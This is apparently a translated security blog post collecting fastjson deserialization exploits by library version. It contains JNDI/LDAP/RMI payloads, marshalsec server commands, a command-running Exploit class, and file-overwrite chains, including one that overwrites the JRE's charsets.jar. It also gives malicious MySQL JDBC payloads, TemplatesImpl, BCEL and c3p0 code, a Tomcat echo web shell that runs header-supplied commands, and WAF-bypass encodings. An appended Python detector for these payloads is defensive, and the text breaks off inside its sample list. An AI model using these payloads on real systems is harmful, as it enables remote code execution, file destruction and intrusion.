Reproduction
Tested version: 1.2.47
Detection via dnslog
{"@type":"java.net.Inet4Address", "val":"dnslog"}
{"@type":"java.net.Inet6Address", "val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":, "val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL", "val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL", "val":"dnslog"}]
Set[{"@type":"java.net.URL", "val":"dnslog"}
{{"@type":"java.net.URL", "val":"dnslog"}:0
[{"a":"a\x]  (DoS vulnerability)
{"a":"
{{"@type":"java.net.URL","val":"http://%s"}:"x"}
< 1.2.67:
{"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}
> 1.2.67:
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.lang.AutoCloseable"
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://quw3hz.dnslog.cn",
        "autoCommit":true
    }
}
JdbcRowSetImpl
python3 -m http.server
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Log4jRCE" 1389
Exploit.java
public class Exploit {
    // the constructor runs when the class is loaded and instantiated via JNDI
    public Exploit() {
        try {
            Runtime.getRuntime().exec(new String[]{"calc.exe"});
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}
payload
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://127.0.0.1:1389/Calc",
        "autoCommit": true
    }
}
Bypass on newer Java versions
Reference:
https://www.penson.top/article/av29#toc-heading-4
Payload collection:
Affected versions:
fastjson <= 1.2.24
exp:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}
Affected versions:
fastjson <= 1.2.41
Precondition: only usable when the autoTypeSupport property is true (it defaults to false since fastjson >= 1.2.25).
exp:
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}
Affected versions:
fastjson <= 1.2.42
Precondition: only usable when the autoTypeSupport property is true (it defaults to false since fastjson >= 1.2.25).
exp:
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
Affected versions:
fastjson <= 1.2.43
Precondition: only usable when the autoTypeSupport property is true (it defaults to false since fastjson >= 1.2.25).
exp:
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
Affected versions:
fastjson <= 1.2.45
Precondition: only usable when the autoTypeSupport property is true (it defaults to false since fastjson >= 1.2.25).
exp:
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}
Affected versions:
fastjson <= 1.2.47
exp:
{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://x.x.x.x:1999/Exploit", "autoCommit": true }}
Affected versions:
fastjson <= 1.2.62
exp:
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}
Affected versions:
fastjson <= 1.2.66
Precondition: only usable when the autoTypeSupport property is true (it defaults to false since fastjson >= 1.2.25).
exp:
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}
fastjson <= 1.2.68 arbitrary file write
{
    "x":{
        "@type":"java.lang.AutoCloseable",
        "@type":"sun.rmi.server.MarshalOutputStream",
        "out":{
            "@type":"java.util.zip.InflaterOutputStream",
            "out":{
                "@type":"java.io.FileOutputStream",
                "file":"/tmp/dest.txt",
                "append":false
            },
            "infl":{ "input":"eJwL8nUyNDJSyCxWyEgtSgUAHKUENw==" },
            "bufLen":1048576
        },
        "protocolVersion":1
    }
}

{
    "x":{
        "@type":"java.lang.AutoCloseable",
        "@type":"sun.rmi.server.MarshalOutputStream",
        "out":{
            "@type":"java.util.zip.InflaterOutputStream",
            "out":{
                "@type":"java.io.FileOutputStream",
                "file":"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.282.b08-1.el7_9.x86_64/jre/lib/charsets.jar",
                "append":false
            },
            "infl":{ "input":"xxx" },
            "bufLen":1048576
        },
        "protocolVersion":1
    }
}

{"x":{"@type":"java.nio.charset.Charset","val":"500"}}
This chain only exists on CentOS, so its scope is quite narrow; when I tested it on Windows it kept throwing errors, and after some searching I finally found the reason:
when fastjson deserializes through a constructor that takes parameters, it checks whether the parameters carry names, and only parameterized constructors with named parameters are accepted,
while sun.rmi.server.MarshalOutputStream does not exist on Windows.
commons-io arbitrary file write
ReaderInputStream + CharSequenceReader build the input stream
WriterOutputStream + FileWriterWithEncoding build the output stream
{
    "x":{
        "@type":"com.alibaba.fastjson.JSONObject",
        "input":{
            "@type":"java.lang.AutoCloseable",
            "@type":"org.apache.commons.io.input.ReaderInputStream",
            "reader":{
                "@type":"org.apache.commons.io.input.CharSequenceReader",
                "charSequence":{"@type":"java.lang.String""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[... a run of several thousand 'a' padding characters, shortened here ...]aaaaaaaaaaaaaaaapenson"}
            },
            "charsetName":"UTF-8",
            "bufferSize":1024
        },
        "branch":{
            "@type":"java.lang.AutoCloseable",
            "@type":"org.apache.commons.io.output.WriterOutputStream",
            "writer":{
                "@type":"org.apache.commons.io.output.FileWriterWithEncoding",
                "file":"./1.txt",
                "encoding":"UTF-8",
                "append": false
            },
            "charsetName":"UTF-8",
            "bufferSize": 1024,
            "writeImmediately": true
        },
        "trigger":{
            "@type":"java.lang.AutoCloseable",
            "@type":"org.apache.commons.io.input.XmlStreamReader",
            "is":{
                "@type":"org.apache.commons.io.input.TeeInputStream",
                "input":{ "$ref":"$.input" },
                "branch":{ "$ref":"$.branch" },
                "closeBranch": true
            },
            "httpContentType":"text/xml",
            "lenient":false,
            "defaultEncoding":"UTF-8"
        },
        "trigger2":{
            "@type":"java.lang.AutoCloseable",
            "@type":"org.apache.commons.io.input.XmlStreamReader",
            "is":{
                "@type":"org.apache.commons.io.input.TeeInputStream",
                "input":{ "$ref":"$.input" },
                "branch":{ "$ref":"$.branch" },
                "closeBranch": true
            },
            "httpContentType":"text/xml",
            "lenient":false,
            "defaultEncoding":"UTF-8"
        },
        "trigger3":{
            "@type":"java.lang.AutoCloseable",
            "@type":"org.apache.commons.io.input.XmlStreamReader",
            "is":{
                "@type":"org.apache.commons.io.input.TeeInputStream",
                "input":{ "$ref":"$.input" },
                "branch":{ "$ref":"$.branch" },
                "closeBranch": true
            },
            "httpContentType":"text/xml",
            "lenient":false,
            "defaultEncoding":"UTF-8"
        }
    }
}
Chain: XmlStreamReader's InputStream is a TeeInputStream; the TeeInputStream's input is the ReaderInputStream and its branch (OutputStream) is the WriterOutputStream, so whatever XmlStreamReader reads is copied into the file.
import org.apache.commons.io.input.CharSequenceReader;
import org.apache.commons.io.input.ReaderInputStream;
import org.apache.commons.io.input.TeeInputStream;
import org.apache.commons.io.input.XmlStreamReader;
import org.apache.commons.io.output.FileWriterWithEncoding;
import org.apache.commons.io.output.WriterOutputStream;

public class Test {
    public static void main(String[] args) throws Exception {
        String test = "asd";
        // input side: CharSequenceReader -> ReaderInputStream
        CharSequenceReader charSequenceReader = new CharSequenceReader(test);
        ReaderInputStream readerInputStream = new ReaderInputStream(charSequenceReader, "UTF-8", 1024);
        // output side: FileWriterWithEncoding -> WriterOutputStream
        FileWriterWithEncoding fileWriterWithEncoding = new FileWriterWithEncoding("1.txt", "UTF-8");
        WriterOutputStream writerOutputStream = new WriterOutputStream(fileWriterWithEncoding, "UTF-8", 1024, true);
        // TeeInputStream copies everything read from input into branch;
        // XmlStreamReader reads from its stream in the constructor, which drives the copy
        TeeInputStream teeInputStream = new TeeInputStream(readerInputStream, writerOutputStream);
        XmlStreamReader xmlStreamReader = new XmlStreamReader(teeInputStream);
    }
}
Drawback: only the first 8192 characters are written.
Required dependency:
<dependency>
    <groupId>commons-io</groupId>
    <artifactId>commons-io</artifactId>
    <version>2.5</version>
</dependency>
Chaitin's article already gives a detailed analysis, so only a summary is given here.
References:
https://www.cnblogs.com/zpchcbd/p/14969606.html
https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg
fastjson <= 1.2.68 JDBC deserialization
<dependency>
    <groupId>mysql</groupId>
    <artifactId>mysql-connector-java</artifactId>
    <version>5.1.12</version>
</dependency>
{
    "name": {
        "@type": "java.lang.AutoCloseable",
        "@type": "com.mysql.jdbc.JDBC4Connection",
        "hostToConnectTo": "127.0.0.1",
        "portToConnectTo": 3306,
        "info": {
            "user": "CommonsCollections2",
            "password": "pass",
            "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
            "autoDeserialize": "true",
            "NUM_HOSTS": "1"
        },
        "databaseToConnectTo": "dbname",
        "url": ""
    }
}
CommonsCollections2 is the CC chain to be used.
<dependency>
    <groupId>mysql</groupId>
    <artifactId>mysql-connector-java</artifactId>
    <version>6.0.2</version>
</dependency>
{
    "name": {
        "@type":"java.lang.AutoCloseable",
        "@type":"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
        "proxy": {
            "connectionString":{
                "url":"jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&useSSL=false&user=yso_CommonsCollections2_calc"
            }
        }
    }
}
https://github.com/fnmsd/MySQL_Fake_Server
A malicious MySQL server is required; one has already been written (the repository above).
Reference:
https://www.cnblogs.com/pickmea/p/15157189.html
fastjson 1.2.68
{
    "@type":"java.lang.AutoCloseable",
    "@type":"com.mysql.jdbc.JDBC4Connection",
    "hostToConnectTo":"172.20.64.40",
    "portToConnectTo":3306,
    "url":"jdbc:mysql://172.20.64.40:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
    "databaseToConnectTo":"test",
    "info":{
        "@type":"java.util.Properties",
        "PORT":"3306",
        "statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize":"true",
        "user":"yso_URLDNS_http://ahfladhjfd.6fehoy.dnslog.cn",
        "PORT.1":"3306",
        "HOST.1":"172.20.64.40",
        "NUM_HOSTS":"1",
        "HOST":"172.20.64.40",
        "DBNAME":"test"
    }
}
Solutions when the target has no outbound network access
Exploitation method:
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
Building the TemplatesImpl POC is more involved than JdbcRowSetImpl, and it has requirements on the parser Feature flags used for deserialization: with parseObject the call must be JSON.parseObject(json, Object.class, Feature.SupportNonPublicField), and with the parse method it must be JSON.parse(json, Feature.SupportNonPublicField). The upside is that no outbound connection is needed to load the malicious class.
It is essentially a modified ysoserial CC chain, but the exploitation conditions are still quite strict: the Feature has to be set.
package com.fastjson;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtNewConstructor;
import org.apache.tomcat.util.codec.binary.Base64;

public class TemplatesImpl {
    // generate a class whose constructor runs the command
    public static CtClass makeClass() throws CannotCompileException {
        ClassPool classPool = ClassPool.getDefault();
        CtClass clazz = classPool.makeClass("com.summersec.x.Test" + System.nanoTime());
        clazz.addConstructor(CtNewConstructor.make("public Test(){ Runtime.getRuntime().exec(\"calc.exe\");}", clazz));
        return clazz;
    }

    public static void main(String args[]) throws Exception {
        ClassPool aDefault = ClassPool.getDefault();
        CtClass ctClass = makeClass();
        // TemplatesImpl only instantiates subclasses of AbstractTranslet
        ctClass.setSuperclass((aDefault.get(AbstractTranslet.class.getName())));
        byte[] evilCode = ctClass.toBytecode();
        String encode = Base64.encodeBase64String(evilCode);
        String json = "{" +
                " \"a\": {" +
                " \"@type\": \"java.lang.Class\"," +
                " \"val\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"" +
                " }," +
                " \"b\": {" +
                " \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," +
                " \"_bytecodes\": [\"" + encode + "\"]," +
                " '_name': 'a.b'," +
                " '_tfactory': {}," +
                " \"_outputProperties\": {}," +
                " \"_name\": \"b\"," +
                " \"_version\": \"1.0\"," +
                " \"allowedProtocols\": \"all\"" +
                " }" +
                "}";
        System.out.println(json);
        // SupportNonPublicField is required so that the private _bytecodes field is populated
        JSON.parseObject(json, Object.class, Feature.SupportNonPublicField);
    }
}
payload:
{
    "a": { "@type": "java.lang.Class", "val": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" },
    "b": {
        "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
        "_bytecodes": ["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"],
        '_name': 'a.b',
        '_tfactory': {},
        "_outputProperties": {},
        "_name": "b",
        "_version": "1.0",
        "allowedProtocols": "all"
    }
}
Combined with Tomcat echo
This uses the echo technique from the earlier analysis of Java deserialization vulnerabilities:
https://www.penson.top/article/av30#toc-heading-2
package com.fastjson不出网;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.*;
import org.apache.tomcat.util.codec.binary.Base64;

public class TemplatesImpl {
    public static CtClass makeClass() throws CannotCompileException {
        ClassPool classPool = ClassPool.getDefault();
        CtClass clazz = classPool.makeClass("com.summersec.x.Test" + System.nanoTime());
        clazz.addConstructor(CtNewConstructor.make("public Test(){ Runtime.getRuntime().exec(\"calc.exe\");}", clazz));
        return clazz;
    }

    // Builds the echo class: starting from the current thread it walks the object graph
    // by reflection until it finds the HttpServletRequest, then writes into its response.
    public static CtClass genPayload(ClassPool pool) throws Exception {
        CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime());
        if ((clazz.getDeclaredConstructors()).length != 0) {
            clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
        }
        //HTTPServletRequest.class
        //HTTPServletResponse.class
        clazz.addField(CtField.make("static java.util.HashSet/*<Object>*/ h;", clazz));
        clazz.addField(CtField.make("static javax.servlet.http.HttpServletRequest r;", clazz));
        clazz.addField(CtField.make("static javax.servlet.http.HttpServletResponse p;", clazz));
        // clazz.addField(CtField.make("static int depth ;",clazz));
        // i(): visited-set check so the graph walk does not loop on cycles
        clazz.addMethod(CtMethod.make("private static boolean i(Object obj){ if(obj==null|| h.contains(obj)){ return true; } h.add(obj); return false; }", clazz));
        // earlier inline version of F(), kept commented out:
        // clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){ Class n=start.getClass(); do{ java.lang.reflect.Field declaredField = null; java.lang.reflect.Field[] fields = n.getDeclaredFields(); int length = n.getDeclaredFields().length; for (int i =0 ; i <= length; i++){ declaredField = fields[i]; declaredField.setAccessible(true); Object o = null; try{ o = declaredField.get(start); if(!o.getClass().isArray()){ p(o,depth); }else{ Object[] array = (Object[])o; for (int q = 0; q < array.length; q++){ p(array[q], depth); } } }catch (Exception e){ } } }while( (n = n.getSuperclass())!=null ); }",clazz));
        // F() is declared empty first so that p() can reference it; its body is set further down
        clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){}", clazz));
        clazz.addMethod(CtMethod.make(
                " private static void p(Object o, int depth){\n" +
                "     if(depth > 52||(r !=null&& p !=null)){\n" +
                "         return;\n" +
                "     }\n" +
                "     if(!i(o)){\n" +
                "         if(r ==null&&javax.servlet.http.HttpServletRequest.class.isAssignableFrom(o.getClass())){\n" +
                "             r = (javax.servlet.http.HttpServletRequest)o;\n" +
                "             if(r.getHeader(\"Ctmd\")==null && r.getHeader(\"c\") == null) {\n" +
                "                 r = null;\n" +
                "             }else{\n" +
                "                 try {\n" +
                "                     p = (javax.servlet.http.HttpServletResponse) r.getClass().getMethod(\"getResponse\",null).invoke(r,null);\n" +
                "\n" +
                "                 } catch (Exception e) {\n" +
                "                     r = null;\n" +
                "                 }\n" +
                "             }\n" +
                "\n" +
                "         }\n" +
                "         if(r !=null&& p !=null){\n" +
                "             try {\n" +
                "                 \n" +
                "                 if (r.getHeader(\"Ctmd\") != null) {\n" +
                "                     p.addHeader(\"techo\",r.getHeader(\"Ctmd\"));\n" +
                "                 }else {\n" +
                "                     p.getWriter().println(\"$$$\" + new java.util.Scanner(Runtime.getRuntime().exec(r.getHeader(\"c\")).getInputStream()).useDelimiter(\"\\\\A\").next() + \"$$$\");\n" +
                //"                     p.getWriter().println(\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(new java.util.Scanner(Runtime.getRuntime().exec(org.apache.shiro.codec.Base64.decodeToString(r.getHeader(\"c\"))).getInputStream()).useDelimiter(\"\\\\A\").next().getBytes()) + \"$$$\");\n" +
                "                     p.getWriter().flush();\n" +
                "                     p.getWriter().close();\n" +
                "                 }\n" +
                "                 \n" +
                "\n" +
                "             }catch (Exception e){\n" +
                "             }\n" +
                "             return;\n" +
                "         }\n" +
                "\n" +
                "         F(o,depth+1);\n" +
                "     }\n" +
                " }", clazz));
        // F(): iterate over every declared field up the class hierarchy and recurse via p()
        clazz.getDeclaredMethod("F").setBody(
                "{Class n = $1.getClass();\n" +
                " do{\n" +
                "     java.lang.reflect.Field f = null;\n" +
                "     int l = n.getDeclaredFields().length;\n" +
                "     for (int i = 0; i < l; i++) {\n" +
                "         f = n.getDeclaredFields()[i];\n" +
                "         f.setAccessible(true);\n" +
                "         Object o = null;\n" +
                "         try{\n" +
                "             o = f.get($1);\n" +
                "\n" +
                "             if(!o.getClass().isArray()){\n" +
                "                 p(o,$2);\n" +
                "             }else{\n" +
                "                 Object q = null;\n" +
                "                 Object[] objs = (Object[])o;\n" +
                "                 int len = java.lang.reflect.Array.getLength(o);\n" +
                "                 for (int j = 0; j < len; j++) {\n" +
                "                     q = objs[j];\n" +
                "                     p(q, $2);\n" +
                "                 }\n" +
                "\n" +
                "             }\n" +
                "\n" +
                "         }catch (Exception e){\n" +
                "         }\n" +
                "     }\n" +
                "\n" +
                " }while(\n" +
                "     (n = n.getSuperclass())!=null\n" +
                " );}");
        // the constructor kicks off the walk from the current thread
        clazz.addConstructor(CtNewConstructor.make("public dfs(){ r = null; p = null; h =new java.util.HashSet/*<Object>*/(); F(Thread.currentThread(),0); }", clazz));
        return clazz;
    }

    public static void main(String args[]) throws Exception {
        ClassPool aDefault = ClassPool.getDefault();
        CtClass ctClass = genPayload(aDefault);
        ctClass.setSuperclass((aDefault.get(AbstractTranslet.class.getName())));
        byte[] evilCode = ctClass.toBytecode();
        String encode = Base64.encodeBase64String(evilCode);
        String json = "{" +
                " \"a\": {" +
                " \"@type\": \"java.lang.Class\"," +
                " \"val\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"" +
                " }," +
                " \"b\": {" +
                " \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," +
                " \"_bytecodes\": [\"" + encode + "\"]," +
                " '_name': 'a.b'," +
                " '_tfactory': {}," +
                " \"_outputProperties\": {}," +
                " \"_name\": \"b\"," +
                " \"_version\": \"1.0\"," +
                " \"allowedProtocols\": \"all\"" +
                " }" +
                "}";
        System.out.println(json);
        JSON.parseObject(json, Object.class, Feature.SupportNonPublicField);
    }
}
{
    "a": { "@type": "java.lang.Class", "val": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" },
    "b": {
        "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
        "_bytecodes": ["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"],
        '_name': 'a.b',
        '_tfactory': {},
        "_outputProperties": {},
        "_name": "b",
        "_version": "1.0",
        "allowedProtocols": "all"
    }
}
org.apache.tomcat.dbcp.dbcp2.BasicDataSource
This relies on the Tomcat dependency, or on a Tomcat environment being present.
<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-dbcp</artifactId>
    <version>9.0.8</version>
</dependency>
Encode the malicious class file into BCEL format (runs on older Java versions)
exp
package com.fastjson不出网;

import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.io.BufferedWriter;
import java.io.FileWriter;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class dbcp {
    public static void main(String[] args) throws IOException {
        // read the compiled class bytes
        Path path = Paths.get("F:\\网络安全\\java安全\\jndi_test\\src\\main\\java\\com\\learn\\exp\\Test.class");
        byte[] bytes = Files.readAllBytes(path);
        System.out.println(bytes.length);
        // BCEL-encode them and write the result with the $$BCEL$$ prefix
        String result = Utility.encode(bytes, true);
        BufferedWriter bw = new BufferedWriter(new FileWriter("F:\\网络安全\\java安全\\jndi_test\\src\\main\\java\\com\\fastjson不出网\\1.txt"));
        bw.write("$$BCEL$$" + result);
        bw.close();
    }
}
<=1.2.47
{
    "a": { "@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" },
    "b": { "@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader" },
    "c": {
        "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
        "driverClassLoader": { "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" },
        "driverClassName": "###EVIL_CODE###"
    }
}
But this approach only works on older Java versions, and the conditions are still quite strict:
with parseObject it only takes effect when the type is Object.class; otherwise switch to the parse method.
See phith0n's (p神) article:
https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html
where he gives a good explanation.
c3p0 deserialization combined with a CC chain to carry in the Tomcat echo
Since c3p0 is very widely used, this is quite useful; there are many analyses of the c3p0 chains online.
A string starting with HexAsciiSerializedMap is automatically decoded and triggers native Java deserialization.
package com.fastjson不出网;

import com.alibaba.fastjson.JSON;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;

public class C3p0 {
    public static void main(String[] args) throws Exception {
        // Allecho / CommonsCollections2.echogenerate come from the echo gadget code referenced above
        Allecho allecho = new Allecho();
        byte[] payload = CommonsCollections2.echogenerate(allecho);
        // c3p0 decodes the hex string after the HexAsciiSerializedMap: prefix and deserializes it
        String HexString = bytesToHexString(payload, payload.length);
        String poc = "{\"e\":{\"@type\":\"java.lang.Class\",\"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"},"
                + "\"f\":{\"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\"userOverridesAsString\":\"HexAsciiSerializedMap:" + HexString + ";\"}}";
        System.out.println(poc);
        // JSON.parseObject(poc);
    }

    public static byte[] toByteArray(InputStream in) throws IOException {
        byte[] classBytes;
        classBytes = new byte[in.available()];
        in.read(classBytes);
        in.close();
        return classBytes;
    }

    // upper-case hex encoding, two characters per byte
    public static String bytesToHexString(byte[] bArray, int length) {
        StringBuffer sb = new StringBuffer(length);
        for (int i = 0; i < length; ++i) {
            String sTemp = Integer.toHexString(255 & bArray[i]);
            if (sTemp.length() < 2) {
                sb.append(0);
            }
            sb.append(sTemp.toUpperCase());
        }
        return sb.toString();
    }
}
http://redteam.today/2020/04/18/c3p0%E7%9A%84%E4%B8%89%E4%B8%AAgadget/
https://github.com/depycode/fastjson-c3p0
Fastjson WAF bypass
1. Unicode encoding
{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://t00ls.5cd37009d59fc2c7fc55f2bee57cafab.dnslog.cn/aaa","autoCommit":true}}
2. A payload from a CTF challenge in the XCTF 校战“疫” event: \x74
{"@\x74ype":"org.apache.commons.configuration.JNDIConfiguration","- prefix":"rmi://xxx.xxx"}
3. \b
{"@type":\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}}
4. /**/
{"@type":/**/"Lcom.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":
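A normalizing detector for the payload shapes collected in this post, added here as an example (not code from the original post): it undoes the \uXXXX, \xHH, \b and /**/ tricks from the WAF-bypass section, strips the L...; and [ descriptor wrappers from the version-specific payloads above, and then flags the gadget classes, dnslog probe classes, java.lang.Class cache priming, JNDI URLs and no-outbound-network markers (TemplatesImpl, BCEL, c3p0, JDBC) named on this page. The sample bodies are constructed; GADGET_CLASSES and MARKERS are drawn from this page and should be extended for your own environment.

```python
import re

# Gadget classes named in the payload collection above; extend for your own environment.
GADGET_CLASSES = (
    "com.sun.rowset.JdbcRowSetImpl", "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "org.apache.xbean.propertyeditor.JndiConverter", "org.apache.shiro.jndi.JndiObjectFactory",
    "br.com.anteros.dbcp.AnterosDBCPConfig", "org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
    "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig", "sun.rmi.server.MarshalOutputStream",
    "org.apache.commons.io.input.ReaderInputStream", "com.mysql.jdbc.JDBC4Connection",
    "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection", "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource", "org.apache.commons.configuration.JNDIConfiguration",
)
# Resolver classes behind the dnslog probes at the top of the post.
PROBE_CLASSES = ("java.net.Inet4Address", "java.net.Inet6Address", "java.net.InetSocketAddress", "java.net.URL")
# Markers of the no-outbound-network chains (TemplatesImpl, BCEL, c3p0, JDBC) discussed above.
MARKERS = ("_bytecodes", "$$BCEL$$", "HexAsciiSerializedMap", "autoDeserialize=true")

_TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')
_CLASS_VAL_RE = re.compile(r'"@type"\s*:\s*"java\.lang\.Class"\s*,\s*"val"\s*:\s*"([^"]+)"')
_JNDI_RE = re.compile(r'\b(?:ldaps?|rmi)://[^"\s]+', re.I)

def normalize(body: str) -> str:
    """Undo the encodings from the WAF-bypass section so '@type' matches literally."""
    s = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), body)
    s = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)  # /**/ wedged between ':' and the value
    return s.replace("\\b", "")                  # stray \b escape splitting key and value

def canonical_class(name: str) -> str:
    """Strip the JVM descriptor wrappers used by the 1.2.41-1.2.43 bypasses."""
    name = name.lstrip("[")                       # '[com.x.Y' array descriptor
    while name.startswith("L") and name.endswith(";"):
        name = name[1:-1]                         # 'Lcom.x.Y;' and 'LLcom.x.Y;;'
    if re.match(r"^L[a-z]+\.", name):             # 'Lcom.x.Y' written without the ';'
        name = name[1:]
    return name

def scan(body: str) -> dict:
    """Return canonical class names and (kind, detail) findings; no findings means clean."""
    s = normalize(body)
    typed = [canonical_class(c) for c in _TYPE_RE.findall(s)]
    primed = [canonical_class(c) for c in _CLASS_VAL_RE.findall(s)]
    findings = []
    if "@type" in s and "@type" not in body:
        findings.append(("hidden_type_key", "@type"))   # key only visible after decoding
    for cls in primed:
        findings.append(("class_cache_priming", cls))   # java.lang.Class/val trick (<= 1.2.47)
    classes = list(dict.fromkeys(typed + primed))        # dedupe, keep order
    for cls in classes:
        if any(g in cls for g in GADGET_CLASSES):
            findings.append(("gadget_class", cls))
        elif cls in PROBE_CLASSES:
            findings.append(("dns_probe_class", cls))
        elif cls == "java.lang.AutoCloseable":
            findings.append(("expect_class_chain", cls))  # double @type via the expected interface
    for m in _JNDI_RE.finditer(s):
        findings.append(("jndi_url", m.group(0)))
    for marker in MARKERS:
        if marker in s:
            findings.append(("marker", marker))
    return {"classes": classes, "findings": findings}

def _uesc(text: str) -> str:  # build a \uXXXX-escaped fragment for a constructed sample
    return "".join("\\u%04x" % ord(ch) for ch in text)

# Constructed request bodies modelled on the payload shapes discussed above.
SAMPLES = {
    "unicode": '{"b":{"%s":"%s","dataSourceName":"ldap://127.0.0.1:1389/a","autoCommit":true}}'
               % (_uesc("@type"), _uesc("com.sun.rowset.JdbcRowSetImpl")),
    "hex_key": '{"@\\x74ype":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://127.0.0.1:1099/x"}',
    "backspace": '{"@type":\\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}',
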